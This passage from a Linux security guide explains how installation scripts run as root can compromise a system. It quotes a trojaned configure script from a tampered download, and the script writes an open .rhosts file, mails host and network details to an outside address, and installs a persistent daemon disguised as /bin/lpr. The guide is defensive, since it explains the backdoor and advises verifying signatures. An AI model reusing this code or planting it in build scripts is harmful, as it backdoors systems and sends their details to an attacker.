It is often claimed that Linux (and UNIX) is rather safe from virii, worms, and trojans. However, this is largely based on two facts:
- No unsafe automatic actions
Most Linux applications will not perform unsafe actions (like executing scripts) automatically.
- Sandboxed users
Users have limited privileges only. Only the superuser can access and modify the system.
Installing an application requires to run some scripts and/or makefiles, usually with superuser privileges, at least for installation to system directories. Thus, whenever you install an application, you give up all what makes Linux more secure than some other operating systems, and you basically give control over your system to the installation scripts of that application. This is true for RPMs as well as for installations from source.
As an example, the following has been found in the configure script (see Section 9>) of a popular applications source code, downloaded from an ftp server that apparently got cracked:
# checking if we are root or not if [ `whoami` == "root" ];then root_user=1 else root_user=0 fi
... and further below:
if [ $root_user != "1" ];then echo "+ +" > ~/.rhosts echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig >>/ mail email@example.com < /tmp/jea rm -rf /tmp/jea else if [ `uname -s` != Linux ];then echo "" else mv -f .xinitrc /bin/lpr echo "# printing status monitor" >> /etc/rc.d/rc.local echo "/bin/lpr &" >> /etc/rc.d/rc.local hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea mail firstname.lastname@example.org < /tmp/jea /bin/lpr & rm -rf /tmp/jea fi
Basically, the shell script fragment above will create a backdoor on the machine, either by writing an insecure .rhosts or by installing a daemon that listens for connections (the file .xinitrc that gets copied to /bin/lpr). Then the address of the machine gets mailed to the cracker.
In order to save yourself from such nasty surprises, you should download RPMs or source code only from trustworthy locations, and/or verify GnuPG (PGP) signatures if provided. If there is no PGP signature, mail the author, or try to locate a mirror, download a copy of the same software from there, and compare the two downloads.